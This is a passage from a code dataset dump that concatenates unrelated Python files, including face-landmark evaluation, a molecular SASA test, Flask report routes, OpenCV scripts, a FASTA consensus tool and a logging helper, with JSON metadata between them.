conf_s['architecture'] #'architecture.json'\n self.load_weights = conf_s['weights'] #'weights.h5'\n self.load_weights_checkpoint = conf_s['weights_checkpoint'] #'weights_checkpoint.h5'\n self.save_labelset = self.result_path + conf_s['labelset'] #'label.csv'\n self.save_label3dset = self.result_path + conf_s['label3dset'] \n self.save_score = self.result_path + conf_s['score'] #'score.csv'\n self.model_path = conf_s['model_path']\n\nlandmark_dict = {'0':'left_eye_outer_corner_x',\n '1':'left_eye_outer_corner_y',\n '2':'left_eye_inner_corner_x',\n '3':'left_eye_inner_corner_y',\n '4':'right_eye_inner_corner_x',\n '5':'right_eye_inner_corner_y',\n '6': 'right_eye_outer_corner_x',\n '7': 'right_eye_outer_corner_y',\n '8': 'left_nose_top_x',\n '9': 'left_nose_top_y',\n '10': 'left_nose_bottom_x',\n '11': 'left_nose_bottom_y',\n '12': 'right_nose_top_x',\n '13': 'right_nose_top_y',\n '14': 'right_nose_bottom_x',\n '15': 'right_nose_bottom_y',\n '16': 'nose_root_x',\n '17': 'nose_root_y',\n '18': 'mouth_center_top_lip_x',\n '19': 'mouth_center_top_lip_y',\n '20': 'mouth_left_corner_x',\n '21': 'mouth_left_corner_y',\n '22': 'mouth_center_bottom_lip_x',\n '23': 'mouth_center_bottom_lip_y',\n '24': 'mouth_right_corner_x',\n '25': 'mouth_right_corner_y',\n '26': 'mouth_center_lip_x',\n '27': 'mouth_center_lip_y'}\n\ngenderlabel_dict = {'0':'man',\n '1':'woman'}\n\nagelabel_dict = {'0':'20',\n '1':'30',\n '2':'40',\n '3':'50',\n '4':'60'}\n\nlandmark3d_dict = {'0':'left_eye_outer_corner_x',\n '1':'left_eye_outer_corner_y',\n '2':'left_eye_outer_corner_z',\n '3':'left_eye_inner_corner_x',\n '4':'left_eye_inner_corner_y',\n '5':'left_eye_inner_corner_z',\n '6':'right_eye_inner_corner_x',\n '7':'right_eye_inner_corner_y',\n '8':'right_eye_inner_corner_z',\n '9': 'right_eye_outer_corner_x',\n '10': 'right_eye_outer_corner_y',\n '11': 'right_eye_outer_corner_z',\n '12': 'left_nose_top_x',\n '13': 'left_nose_top_y',\n '14': 'left_nose_top_z',\n '15': 'left_nose_bottom_x',\n '16': 'left_nose_bottom_y',\n '17': 'left_nose_bottom_z',\n '18': 'right_nose_top_x',\n '19': 'right_nose_top_y',\n '20': 'right_nose_top_z',\n '21': 'right_nose_bottom_x',\n '22': 'right_nose_bottom_y',\n '23': 'right_nose_bottom_z',\n '24': 'nose_root_x',\n '25': 'nose_root_y',\n '26': 'nose_root_z',\n '27': 'mouth_center_top_lip_x',\n '28': 'mouth_center_top_lip_y',\n '29': 'mouth_center_top_lip_z',\n '30': 'mouth_left_corner_x',\n '31': 'mouth_left_corner_y',\n '32': 'mouth_left_corner_z',\n '33': 'mouth_center_bottom_lip_x',\n '34': 'mouth_center_bottom_lip_y',\n '35': 'mouth_center_bottom_lip_z',\n '36': 'mouth_right_corner_x',\n '37': 'mouth_right_corner_y',\n '38': 'mouth_right_corner_z',\n '39': 'mouth_center_lip_x',\n '40': 'mouth_center_lip_y',\n '41': 'mouth_center_lip_z'}\n\n\nif __name__ == \"__main__\":\n\n ev = Evaluate('Image', 'yland')\n config_files = glob.glob(\"./param/batch_ev/base/*.ini\")\n for conf in config_files:\n ev.setParameter(conf)\n ev.run()\n\n","sub_path":"evaluate.py","file_name":"evaluate.py","file_ext":"py","file_size_in_byte":13545,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"563567079","text":"import pytest\n\n\ndef test_calc_sasa():\n from pyxmolpp2.pdb import PdbFile\n from pyxmolpp2.geometry import calc_sasa\n from timeit import default_timer as timer\n import numpy as np\n import glob\n\n for filename in sorted(glob.glob(\"tests_dataset/pdb/rcsb/*.pdb\")):\n frame = PdbFile(filename).get_frame()\n ats = frame.asAtoms\n radii = np.array([1.0] * ats.size)\n coords = ats.toCoords\n\n t1 = timer()\n assert calc_sasa(coords, radii, 0.0, np.array([0], dtype=np.intc)).size == 1\n t2 = timer()\n assert calc_sasa(coords, radii, 0.0, np.array([0, 1, 2, 3, 4], dtype=np.intc)).size == 5\n t3 = timer()\n assert calc_sasa(coords, radii, 0.0).size == radii.size\n t4 = timer()\n assert calc_sasa(coords, radii, 0.0, n_samples=1).size == radii.size\n\n T1, T3 = t2 - t1, t4 - t3\n assert T3 > T1\n\n","sub_path":"pytests/xmol/pdb/test_sasa.py","file_name":"test_sasa.py","file_ext":"py","file_size_in_byte":892,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"583524749","text":"#!/usr/bin/env python\r\n# -*- coding: utf-8 -*-\r\n# @Date : 2018-06-07 16:36:51\r\n# @Author : Chen Cjv (cjvaely@foxmail.com)\r\n# @Link : https://github.com/Cjvaely\r\n# @Version : $Id$\r\n\r\n# datetime:处理日期和时间的标准库\r\n\r\n# datetime.now()返回当前日期和时间,其类型是datetime\r\n\r\n# timestamp:当前时间就是相对于epoch time(1970年1月1日 00:00:00 UTC+00:00时区的时刻)的秒数\r\n# timestamp = 0 = 1970-1-1 00:00:00 UTC+0:00\r\n\r\n# datetime转换为timestamp:dt.timestamp()\r\n# timestamp转换为datetime:datetime.fromtimestamp(t)\r\n\r\n# str转换为datetime:datetime.strptime('timestr','format')\r\n# datetime转换为str:now.strftime()\r\n\r\n# 练习:假设你获取了用户输入的日期和时间如2015-1-21 9:01:30,\r\n# 以及一个时区信息如UTC+5:00,均是str,请编写一个函数将其转换为timestamp:\r\nimport re\r\nfrom datetime import datetime, timezone, timedelta\r\n\r\n\r\ndef to_timestamp(dt_str, tz_str):\r\n st = datetime.strptime(dt_str, '%Y-%m-%d %H:%M:%S')\r\n ts = st.timestamp()\r\n ls = re.match(r'UTC(\\+|\\-)([0-9]?[0-9]+):(00)$', tz_str)\r\n if ls:\r\n if ls.group(1) == '+':\r\n stamp = ts + (8 - int(ls.group(2))) * 3600\r\n else:\r\n stamp = ts + (8 + int(ls.group(2))) * 3600\r\n return stamp\r\n\r\n# 测试:\r\n\r\n\r\nt1 = to_timestamp('2015-6-1 08:10:30', 'UTC+7:00')\r\nassert t1 == 1433121030.0, t1\r\n\r\nt2 = to_timestamp('2015-5-31 16:10:30', 'UTC-09:00')\r\nassert t2 == 1433121030.0, t2\r\n\r\nprint('ok')\r\n","sub_path":"LiaoPython/Datetime.py","file_name":"Datetime.py","file_ext":"py","file_size_in_byte":1495,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"114495116","text":"from flask import render_template\nfrom flask_login import login_required\n\nfrom app import app\n\n\n@app.route('/admin/otcheti/dopolnitelno')\n@login_required\ndef otcheti_kolichstovo_torgovih_tochek():\n context = {\n 'title': '',\n 'username': 'admin',\n 'table_fields': [],\n }\n return render_template('admin/pages/otcheti/kolichstovo_torgovih_tochek.html', context=context)\n\n\n@app.route('/admin/otcheti/okazanie_uslug')\n@login_required\ndef otcheti_okazanie_uslug():\n context = {\n 'title': '',\n 'username': 'admin',\n 'table_fields': [],\n }\n return render_template('admin/pages/otcheti/okazanie_uslug.html', context=context)\n\n\n@app.route('/admin/otcheti/periodizatsia_prodaj')\n@login_required\ndef otcheti_periodizatsia_prodaj():\n context = {\n 'title': '',\n 'username': 'admin',\n 'table_fields': [],\n }\n return render_template('admin/pages/otcheti/periodizatsia_prodaj.html', context=context)\n\n\n@app.route('/admin/otcheti/shahmatka_po_pokupateliam')\n@login_required\ndef otcheti_shahmatka_po_pokupateliam():\n context = {\n 'title': '',\n 'username': 'admin',\n 'table_fields': [],\n }\n return render_template('admin/pages/otcheti/shahmatka_po_pokupateliam.html', context=context)\n\n\n@app.route('/admin/otcheti/shahmatke_po_postavshikam')\n@login_required\ndef otcheti_shahmatke_po_postavshikam():\n context = {\n 'title': '',\n 'username': 'admin',\n 'table_fields': [],\n }\n return render_template('admin/pages/otcheti/shahmatke_po_postavshikam.html', context=context)\n\n@app.route('/admin/otcheti/spisok_otchetov')\n@login_required\ndef otcheti_spisok_otchetov():\n context = {\n 'title': '',\n 'username': 'admin',\n 'table_fields': [],\n }\n return render_template('admin/pages/otcheti/spisok_otchetov.html', context=context)\n\n\n\n","sub_path":"app/routes/Otcheti/OtchetiRoutes.py","file_name":"OtchetiRoutes.py","file_ext":"py","file_size_in_byte":1881,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"124013743","text":"import os\n\nimport cv2\n\nimg = cv2.imread(os.path.dirname(os.path.abspath(\".\")) + \"\\imgs\" + \"\\lfigury.png\", 0)\nborder = 116\nret, img_bin = cv2.threshold(img, border, 255, cv2.THRESH_BINARY + cv2.THRESH_OTSU)\ncv2.imshow(\"Img\", img)\ncv2.imshow(\"Binary\", img_bin)\nfor i in [2, 5, 7, 20]:\n kernel = cv2.getStructuringElement(cv2.MORPH_ELLIPSE, (2 * i + 1, 2 * i + 1))\n img_open = cv2.morphologyEx(img, cv2.MORPH_CLOSE, kernel)\n cv2.imshow(\"Open r = \" + str(i), img_open)\ncv2.waitKey(0)\ncv2.destroyAllWindows()\n","sub_path":"cw08/cw07.py","file_name":"cw07.py","file_ext":"py","file_size_in_byte":513,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"594403201","text":"import requests\n\nfrom collections import Counter\n\nfrom django.core.management.base import BaseCommand\nfrom django.utils import timezone\n\nfrom gyms.models import GymLog\n\n\nclass Command(BaseCommand):\n\n def handle(self, *args, **options):\n url = 'http://lincroad.com/raw_data?pokemon=false&pokestops=false&luredonly=false&gyms=true&scanned=false&spawnpoints=false' # NOQA\n data = requests.get(url)\n gyms = data.json()['gyms']\n teams = [gyms[key]['team_id'] for key in gyms]\n\n counter = dict(Counter(teams))\n \n GymLog.objects.create(\n created=timezone.now(),\n mystic=counter[1],\n valor=counter[2],\n instinct=counter[3],\n )\n","sub_path":"gyms/management/commands/create_gym_log.py","file_name":"create_gym_log.py","file_ext":"py","file_size_in_byte":723,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"612147608","text":"#Written by Nathan on 2/17/14. Counts up total numbers for contingency tables\r\ndef count_contingency():\r\n #import packages, estalish paths\r\n import os\r\n import json\r\n origin = os.path.join('\\Python33','sdsc_rehs_2013')\r\n d_path = os.path.join(origin,'dictionaries')\r\n bpn = json.load(open(os.path.join(d_path,'bacteria_bound_long_posneg.json')))\r\n vpn = json.load(open(os.path.join(d_path,'viruses_bound_long_posneg.json')))\r\n #initialize numbers\r\n bposorder = 0\r\n bposdisorder = 0\r\n bnegorder = 0\r\n bnegdisorder = 0\r\n vposorder = 0\r\n vposdisorder = 0\r\n vnegorder = 0\r\n vnegdisorder = 0\r\n #run through bacteria entries. For number correspondence check posneg_disorder.py\r\n for ep_id in bpn:\r\n for entry in range(len(bpn[ep_id])):\r\n #check if disordered and 1 or 3 (contains positive residue)\r\n if (bpn[ep_id][entry][0] >= .5) and (bpn[ep_id][entry][1] == (1 or 3)):\r\n bposdisorder += 1\r\n #check if ordered and 1 or 3\r\n elif (bpn[ep_id][entry][0] < .5) and (bpn[ep_id][entry][1] == (1 or 3)):\r\n bposorder += 1\r\n #check if disordered and 2 (only negative residue)\r\n elif (bpn[ep_id][entry][0] >= .5) and (bpn[ep_id][entry][1] == 2):\r\n bnegdisorder += 1\r\n #check if ordered and 2\r\n elif (bpn[ep_id][entry][0] < .5) and (bpn[ep_id][entry][1] == 2):\r\n bnegorder += 1\r\n #same as above but for viruses\r\n for ep_id in vpn:\r\n for entry in range(len(vpn[ep_id])):\r\n if (vpn[ep_id][entry][0] >= .5) and (vpn[ep_id][entry][1] == (1 or 3)):\r\n vposdisorder += 1\r\n elif (vpn[ep_id][entry][0] < .5) and (vpn[ep_id][entry][1] == (1 or 3)):\r\n vposorder += 1\r\n elif (vpn[ep_id][entry][0] >= .5) and (vpn[ep_id][entry][1] == 2):\r\n vnegdisorder += 1\r\n elif (vpn[ep_id][entry][0] < .5) and (vpn[ep_id][entry][1] == 2):\r\n vnegorder += 1\r\n print (\"bposorder = \" + str(bposorder))\r\n print (\"bposdiorder = \" + str(bposdisorder))\r\n print (\"bnegorder = \" + str(bnegorder))\r\n print (\"bnegdisorder = \" + str(bnegdisorder))\r\n print (\"vposorder = \" + str(vposorder))\r\n print (\"vposdisorder = \" + str(vposdisorder))\r\n print (\"vnegorder = \" + str(vnegorder))\r\n print (\"vnegdisorder = \" + str(vnegdisorder))\r\n \r\n","sub_path":"24count_contingency.py","file_name":"24count_contingency.py","file_ext":"py","file_size_in_byte":2442,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"439864768","text":"import cv2,time\n\nface_cascade=cv2.CascadeClassifier(\"haarcascade_frontalface_default.xml\")\n\nvideo=cv2.VideoCapture(0)\na=1\nwhile True:\n a=a+1\n check,frame=video.read()\n print(frame)\n \n grey=cv2.cvtColor(frame,cv2.COLOR_BGR2GRAY)\n # search coordinate of image\n faces=face_cascade.detectMultiScale(grey,scaleFactor= 1.05, minNeighbors=5)\n \n print(type(faces))\n print(faces)\n \n for x,y,w,h in faces:\n frame=cv2.rectangle(frame, (x,y), (x+w,y+h), (0,255,0),3)\n \n \n cv2.imshow('capturing',frame)\n cv2.imshow('grey',grey)\n \n key=cv2.waitKey(1)\n if key==ord('q'):\n break\n\nprint(a) #print number of frame\nvideo.release()\ncv2.destroyAllWindows()\n","sub_path":"fd.py","file_name":"fd.py","file_ext":"py","file_size_in_byte":724,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"95041429","text":"#!/usr/bin/env python\n# coding=utf-8\n\nimport argparse\nimport os\nimport sys\n\nfrom Bio import AlignIO\nfrom Bio.Alphabet import IUPAC\nfrom Bio.Seq import Seq\nfrom Bio.SeqRecord import SeqRecord\n\n\ndef consensus(aln, any_n=False, any_gap=False):\n # pre-compute dictionaries on first run\n if \"collapse_iupac\" not in consensus.__dict__:\n # sorted tuples map to iupac codes\n consensus.collapse_iupac = {\n ('-',): '-',\n ('a',): 'a',\n ('g',): 'g',\n ('c',): 'c',\n ('t',): 't',\n ('c', 't'): 'y',\n ('a', 'g'): 'r',\n ('a', 't'): 'w',\n ('c', 'g'): 's',\n ('g', 't'): 'k',\n ('a', 'c'): 'm',\n ('a', 'g', 't'): 'd',\n ('a', 'c', 'g'): 'v',\n ('a', 'c', 't'): 'h',\n ('c', 'g', 't'): 'b',\n ('a', 'c', 'g', 't'): 'n',\n }\n\n # inverse process of collapse_iupac, but n's in input are treated special, so don't expand them\n consensus.expand_iupac = {value: set(key) for key, value in consensus.collapse_iupac.items() if value != 'n'}\n consensus.expand_iupac['n'] = {'n'}\n\n con = \"\"\n for loc in range(aln.get_alignment_length()):\n # expand iupac code to base set\n base_set = set.union(*[consensus.expand_iupac[seq[loc].lower()] for seq in aln])\n\n # with any_gap, any '-' in input will result in '-' in output\n if any_gap and '-' in base_set:\n con += '-'\n continue\n # without any_gap, if vertical '-', return '-'\n elif not any_gap and base_set == {'-'}:\n con += '-'\n continue\n # if not vertical '-', ignore '-'\n elif '-' in base_set:\n base_set.remove('-')\n\n # with any_n, any 'n' in input will result in 'n' in output\n if any_n and 'n' in base_set:\n con += 'n'\n continue\n # without any_n, if vertical 'n', return 'n'\n elif not any_n and base_set == {'n'}:\n con += 'n'\n continue\n # if not vertical 'n', ignore 'n'\n elif 'n' in base_set:\n base_set.remove('n')\n\n # collapse base_set to iupac code\n con += consensus.collapse_iupac[tuple(sorted(base_set))]\n\n return con\n\n\nclass HelpAndQuitOnFailParser(argparse.ArgumentParser):\n \"\"\"custom argparse configuration\n if error parsing, prints help and exits\"\"\"\n\n def error(self, message):\n sys.stderr.write('error: {}\\n'.format(message))\n self.print_help()\n sys.exit(2)\n\n\ndef main():\n parser = HelpAndQuitOnFailParser()\n\n # files/directories\n parser.add_argument('-i', '--input', default=\"alignment.fasta\",\n help='path to input file, or input directory if using batch mode')\n\n parser.add_argument('-o', '--out_file', default=\"consensus.fasta\",\n help='path to output file')\n\n parser.add_argument('--batch_mode', action='store_true',\n help='take an input directory instead of input file')\n\n parser.add_argument('--any_n', action='store_true',\n help=(\"By default, if *all* bases at a location are 'n', the consensus will be a 'n'. \"\n \"This flag changes that rule to return an 'n' if *any* 'n' are found at that loc.\"))\n\n parser.add_argument('--any_gap', action='store_true',\n help=(\"Same as --any_n above. \"\n \"If --any_gap and --any_n are set, gaps take precedence\"))\n\n args = parser.parse_args()\n\n with open(args.out_file, \"wt\") as f:\n # batch mode\n if args.batch_mode:\n for filename in os.listdir(args.input):\n\n sample_name, extension = os.path.splitext(filename)\n if extension not in {\".fasta\", \".fna\"}:\n continue\n\n in_aln = AlignIO.read(os.path.join(args.input, filename), \"fasta\")\n\n con_str = consensus(in_aln, any_n=args.any_n, any_gap=args.any_gap)\n con_seq = Seq(con_str, alphabet=IUPAC.ambiguous_dna)\n con_rec = SeqRecord(con_seq, id=sample_name, name=sample_name, description=\"\")\n\n f.write(con_rec.format(\"fasta\"))\n\n # single file mode\n else:\n sample_name, _ = os.path.splitext(args.input)\n\n in_aln = AlignIO.read(args.input, \"fasta\")\n\n con_str = consensus(in_aln, any_n=args.any_n, any_gap=args.any_gap)\n con_seq = Seq(con_str, alphabet=IUPAC.ambiguous_dna)\n con_rec = SeqRecord(con_seq, id=sample_name, name=sample_name, description=\"\")\n\n f.write(con_rec.format(\"fasta\"))\n\n\nif __name__ == \"__main__\":\n # run main\n sys.exit(main())\n","sub_path":"consensus.py","file_name":"consensus.py","file_ext":"py","file_size_in_byte":4770,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"338707115","text":"def match(s):\n stack = []\n for i in range(len(s)):\n if s[i] == '(' or s[i] == '[' or s[i] == '{':\n stack.append(s[i])\n elif len(stack) == 0 and (s[i] == ')' or s[i] == ']' or s[i] == '}'):\n return \"not balanced\"\n elif s[i] == ')' and stack[len(stack)-1] == '(':\n stack.pop(len(stack)-1)\n elif s[i] == ']' and stack[len(stack)-1] == '[':\n stack.pop(len(stack)-1)\n elif s[i] == '}' and stack[len(stack)-1] == '{':\n stack.pop(len(stack)-1)\n else:\n return \"not balanced\"\n\n if len(stack) != 0:\n return \"not balanced\"\n else:\n return \"balanced\"\n\n\nn = int(input())\nstring = []\n\nfor i in range(n):\n string.append(input())\n\nfor i in range(n):\n print(match(string[i]))\n\n","sub_path":"Code/CodeRecords/2471/60691/288014.py","file_name":"288014.py","file_ext":"py","file_size_in_byte":799,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"307730493","text":"'''\nCopyright 2020 Sensetime X-lab. All Rights Reserved\n\nMain Function:\n 1. log helper, used to help to save logger on terminal, tensorboard or save file.\n 2. CountVar, to help counting number.\n'''\nimport json\nimport logging\nimport numbers\nimport os\nimport sys\n\nimport cv2\nimport numpy as np\nimport yaml\nfrom tabulate import tabulate\nfrom tensorboardX import SummaryWriter\nimport torch\n\ndef build_logger(cfg, name=None, rank=0):\n r'''\n Overview:\n use config to build checkpoint helper. Only rank == 0 can build.\n Arguments:\n - name (:obj:`str`): the logger file name\n - rank (:obj:`int`): only rank == 0 can build, else return TextLogger that only save terminal output\n Returns:\n - logger (:obj:`TextLogger`): logger that save terminal output\n - tb_logger (:obj:`TensorBoardLogger` or :obj:`None`): logger that save output to tensorboard,\n if rank != 0 then None\n - variable_record (:obj:`VariableRecord` or :obj:`None`): logger that record variable for further process,\n if rank != 0 then None\n '''\n path = cfg.common.save_path\n # Note: Only support rank0 tb_logger, variable_record\n if rank == 0:\n logger = TextLogger(path, name=name)\n tb_logger = TensorBoardLogger(path, name=name)\n var_record_type = cfg.learner.get(\"var_record_type\", None)\n if var_record_type is None:\n variable_record = VariableRecord(cfg.learner.log_freq)\n else:\n raise NotImplementedError(\"not support var_record_type: {}\".format(var_record_type))\n return logger, tb_logger, variable_record\n else:\n logger = TextLogger(path, name=name)\n return logger, None, None\n\n\ndef build_logger_naive(path, name, level=logging.INFO, print_freq=1):\n r'''\n Overview:\n use config to build Textlogger and VariableRecord\n Arguments:\n - path (:obj:`str`): logger's save dir, please reference log_helper.TextLogger\n - name (:obj:`str`): the logger file name\n - level (:obj:`int` or :obj:`str`): Set the logging level of logger\n - rank (:obj:`int`): only rank == 0 can build, else return TextLogger that only save terminal output\n Returns:\n - logger (:obj:`TextLogger`): logger that save terminal output\n - variable_record (:obj:`VariableRecord`): logger that record variable for further process\n '''\n logger = TextLogger(path, name, level)\n variable_record = VariableRecord(print_freq)\n return logger, variable_record\n\n\ndef get_default_logger(name=None):\n r\"\"\"\n Overview:\n get the logger using logging.getLogger\n\n Arguments:\n - name (:obj:`str`): the name of logger, if None then get 'default_logger'\n\n Notes:\n you can reference Logger.manager.getLogger(name) in the python3 /logging/__init__.py\n \"\"\"\n if name is None:\n name = 'default_logger'\n return logging.getLogger(name)\n\n\nclass TextLogger(object):\n r\"\"\"\n Overview:\n Logger that save terminal output to file\n\n Interface: __init__, info\n \"\"\"\n\n def __init__(self, path, name=None, level=logging.INFO):\n r\"\"\"\n Overview:\n initialization method, create logger.\n Arguments:\n - path (:obj:`str`): logger's save dir\n - name (:obj:`str`): logger's name\n - level (:obj:`int` or :obj:`str`): Set the logging level of logger, reference Logger class setLevel method.\n \"\"\"\n if name is None:\n name = 'default_logger'\n # ensure the path exists\n try:\n os.makedirs(path)\n except FileExistsError:\n pass\n self.logger = self._create_logger(name, os.path.join(path, name + '.txt'), level=level)\n\n def _create_logger(self, name, path, level=logging.INFO):\n r\"\"\"\n Overview:\n create logger using logging\n Arguments:\n - name (:obj:`str`): logger's name\n - path (:obj:`str`): logger's save dir\n Returns:\n - (:obj`logger`): new logger\n \"\"\"\n logger = logging.getLogger(name)\n logging.basicConfig(stream=sys.stdout, level=logging.INFO, format='[%(asctime)s][%(filename)15s][line:%(lineno)4d][%(levelname)8s] %(message)s')\n if not logger.handlers:\n formatter = logging.Formatter('[%(asctime)s][%(filename)15s][line:%(lineno)4d][%(levelname)8s] %(message)s')\n fh = logging.FileHandler(path, 'a')\n fh.setFormatter(formatter)\n logger.setLevel(level)\n logger.addHandler(fh)\n #handler = logging.StreamHandler()\n #handler.setFormatter(formatter)\n #logger.addHandler(handler)\n #logger.propagate = False\n return logger\n\n def info(self, s):\n r\"\"\"\n Overview:\n add message to logger\n Arguments:\n - s (:obj:`str`): message to add to logger\n Notes:\n you can reference Logger class in the python3 /logging/__init__.py\n \"\"\"\n self.logger.info(s)\n\n def bug(self, s):\n r\"\"\"\n Overview:\n call logger.debug\n Arguments:\n - s (:obj:`str`): message to add to logger\n Notes:\n you can reference Logger class in the python3 /logging/__init__.py\n \"\"\"\n self.logger.debug(s)\n\n def error(self, s):\n self.logger.error(s)\n\n\nclass TensorBoardLogger(object):\n r\"\"\"\n Overview:\n logger that save message to tensorboard\n\n Interface:\n __init__, add_scalar, add_text, add_scalars, add_histogram, add_figure, add_image, add_scalar_list,\n register_var, scalar_var_names\n \"\"\"\n\n def __init__(self, path, name=None):\n r\"\"\"\n Overview:\n initialization method, create logger and set var names.\n Arguments:\n - path (:obj:`str`): logger save dir\n - name (:obj:`str`): logger name\n \"\"\"\n if name is None:\n name = 'default_tb_logger'\n self.logger = SummaryWriter(os.path.join(path, name)) # get summary writer\n self._var_names = {\n 'scalar': [],\n 'text': [],\n 'scalars': [],\n 'histogram': [],\n 'figure': [],\n 'image': [],\n }\n\n def add_scalar(self, name, *args, **kwargs):\n r\"\"\"\n Overview:\n add message to scalar\n Arguments:\n - name (:obj:`str`): name to add which in self._var_names['scalar']\n \"\"\"\n assert (name in self._var_names['scalar'])\n self.logger.add_scalar(name, *args, **kwargs)\n\n def add_text(self, name, *args, **kwargs):\n r\"\"\"\n Overview:\n add message to text\n Arguments:\n - name (:obj:`str`): name to add which in self._var_names['text']\n \"\"\"\n assert (name in self._var_names['text'])\n self.logger.add_text(name, *args, **kwargs)\n\n def add_scalars(self, name, *args, **kwargs):\n r\"\"\"\n Overview:\n add message to scalars\n Arguments:\n - name (:obj:`str`): name to add which in self._var_names['scalars']\n \"\"\"\n assert (name in self._var_names['scalars'])\n self.logger.add_scalars(name, *args, **kwargs)\n\n def add_histogram(self, name, *args, **kwargs):\n r\"\"\"\n Overview:\n add message to histogram\n Arguments:\n - name (:obj:`str`): name to add which in self._var_names['histogram']\n \"\"\"\n assert (name in self._var_names['histogram'])\n self.logger.add_histogram(name, *args, **kwargs)\n\n def add_figure(self, name, *args, **kwargs):\n r\"\"\"\n Overview:\n add message to figure\n Arguments:\n - name (:obj:`str`): name to add which in self._var_names['figure']\n \"\"\"\n assert (name in self._var_names['figure'])\n self.logger.add_figure(name, *args, **kwargs)\n\n def add_image(self, name, *args, **kwargs):\n r\"\"\"\n Overview:\n add message to image\n Arguments:\n - name (:obj:`str`): name to add which in self._var_names['image']\n \"\"\"\n assert (name in self._var_names['image'])\n self.logger.add_image(name, *args, **kwargs)\n\n def add_val_list(self, val_list, viz_type):\n r\"\"\"\n Overview:\n add val_list info to tb\n Arguments:\n - val_list (:obj:`list`): include element(name, value, step) to be added\n - viz_type (:obs:`str`): must be in ['scalar', 'scalars', 'histogram']\n \"\"\"\n assert (viz_type in ['scalar', 'scalars', 'histogram'])\n func_dict = {\n 'scalar': self.add_scalar,\n 'scalars': self.add_scalars,\n 'histogram': self.add_histogram,\n }\n for n, v, s in val_list:\n func_dict[viz_type](n, v, s)\n\n def _no_contain_name(self, name):\n for k, v in self._var_names.items():\n if name in v:\n return False\n return True\n\n def register_var(self, name, var_type='scalar'):\n r\"\"\"\n Overview:\n add var to self_var._names\n\n Arguments:\n - name (:obj:`str`): name to add\n - var_type (:obj:`str`): the type of var to add to, defalut set to 'scalar',\n support [scalar', 'text', 'scalars', 'histogram', 'figure', 'image']\n \"\"\"\n assert (var_type in self._var_names.keys())\n # assert (self._no_contain_name(name))\n self._var_names[var_type].append(name)\n\n @property\n def scalar_var_names(self):\n r\"\"\"\n Overview:\n return scalar_var_names\n Returns:\n - names(:obj:`list` of :obj:`str`): self._var_names['scalar']\n \"\"\"\n return self._var_names['scalar']\n\n\nclass VariableRecord(object):\n r\"\"\"\n Overview:\n logger that record variable for further process\n\n Interface:\n __init__, register_var, update_var, get_var_names, get_var_text, get_vars_tb_format, get_vars_text\n \"\"\"\n\n def __init__(self, length):\n r\"\"\"\n Overview:\n init the VariableRecord\n Arguments:\n - length (:obj:`int`): the length to average across, if less than 10 then will be set to 10\n \"\"\"\n self.var_dict = {'scalar': {}}\n self.length = max(length, 10) # at least average across 10 iteration\n\n def register_var(self, name, length=None, var_type='scalar'):\n r\"\"\"\n Overview:\n add var to self_var._names, calculate it's average value\n Arguments:\n - name (:obj:`str`): name to add\n - length (:obj:`int` or :obj:`None`): length of iters to average, default set to self.length\n - var_type (:obj:`str`): the type of var to add to, defalut set to 'scalar'\n \"\"\"\n assert (var_type in ['scalar'])\n lens = self.length if length is None else length\n self.var_dict[var_type][name] = AverageMeter(lens)\n\n def update_var(self, info):\n r\"\"\"\n Overview:\n update vars\n Arguments:\n - info (:obj:`dict`): key is var type and value is the corresponding variable name\n \"\"\"\n assert isinstance(info, dict)\n for k, v in info.items():\n var_type = self._get_var_type(k)\n self.var_dict[var_type][k].update(v)\n\n def _get_var_type(self, k):\n for var_type, var_type_dict in self.var_dict.items():\n if k in var_type_dict.keys():\n return var_type\n raise KeyError(\"invalid key({}) in variable record\".format(k))\n\n def get_var_names(self, var_type='scalar'):\n r\"\"\"\n Overview:\n get the corresponding variable names of a certain var_type\n Arguments:\n - var_type (:obj:`str`): defalut set to 'scalar', support [scalar']\n Returns:\n - keys (:obj:`list` of :obj:`str`): the var names of a certain var_type\n \"\"\"\n return self.var_dict[var_type].keys()\n\n def get_var_text(self, name, var_type='scalar'):\n r\"\"\"\n Overview:\n get the text discroption of var\n Arguments:\n - name (:obj:`str`): name of the var to query\n - var_type(:obj:`str`): default set to scalar, support ['scalar']\n Returns:\n - text(:obj:`str`): the corresponding text description\n \"\"\"\n assert (var_type in ['scalar'])\n if var_type == 'scalar':\n handle_var = self.var_dict[var_type][name]\n return '{}: val({:.6f})|avg({:.6f})'.format(name, handle_var.val, handle_var.avg)\n else:\n raise NotImplementedError\n\n def get_vars_tb_format(self, keys, cur_step, var_type='scalar', **kwargs):\n r\"\"\"\n Overview:\n get the tb_format description of var\n Arguments:\n - keys (:obj:`list` of :obj:`str`): keys(names) of the var to query\n - cur_step (:obj:`int`): the current step\n - var_type(:obj:`str`): default set to scalar, support support ['scalar']\n Returns:\n - ret (:obj:`list` of :obj:`list` of :obj:`str`): the list of tb_format info of vars queried\n \"\"\"\n assert (var_type in ['scalar'])\n if var_type == 'scalar':\n ret = []\n var_keys = self.get_var_names(var_type)\n for k in keys:\n if k in var_keys:\n v = self.var_dict[var_type][k]\n if k == 'grad':\n ret.append([k, v.val, cur_step])\n else:\n ret.append([k, v.avg, cur_step])\n return ret\n else:\n raise NotImplementedError\n\n def get_vars_text(self):\n r\"\"\"\n Overview:\n get the string description of var\n Returns:\n - ret (:obj:`list` of :obj:`str`): the list of text description of vars queried\n \"\"\"\n headers = [\"Name\", \"Value\", \"Avg\"]\n data = []\n for k in self.get_var_names('scalar'):\n handle_var = self.var_dict['scalar'][k]\n data.append([k, \"{:.6f}\".format(handle_var.val), \"{:.6f}\".format(handle_var.avg)])\n s = \"\\n\" + tabulate(data, headers=headers, tablefmt='grid')\n return s\n\n def get_star_text(self):\n headers = 